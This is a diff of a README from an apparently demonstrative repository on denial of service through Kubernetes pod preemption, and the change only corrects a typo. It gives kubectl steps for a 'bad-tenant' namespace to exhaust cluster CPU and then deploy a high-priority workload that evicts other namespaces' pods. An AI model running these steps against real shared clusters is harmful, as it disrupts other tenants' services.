ariary/kube-podpreemption-DoS/README.md

    * `kubectl -n bad-tenant scale deployment/estimate  --replicas=2`
    * `kubectl -n bad-tenant scale deployment/estimate  --replicas=3`, and so on...

-3. When you we reach `7` replicas, we observe that the new pod is `Pending` ⇒ We have stuffed our cluster and it is likely out of cpu resource (check with `kubectl describe pod [pending_estimate_pod] -n bad-tenant`).
+3. When we reach `7` replicas, we observe that the new pod is `Pending` ⇒ We have stuffed our cluster and it is likely out of cpu resource (check with `kubectl describe pod [pending_estimate_pod] -n bad-tenant`).
 Hence, if we create the same deployment with high-priority it will evict some pods on other ns.

    * delete your low-priority deployment: `kubectl delete -f blind/deployment-estimate-no-priority.yml`
    * create the high-priority deployment & scale it to have 7 replicas: `kubectl apply -f blind/deployment-high.yml && kubectl -n bad-tenant scale deployment/high-priority-evictor  --replicas=7`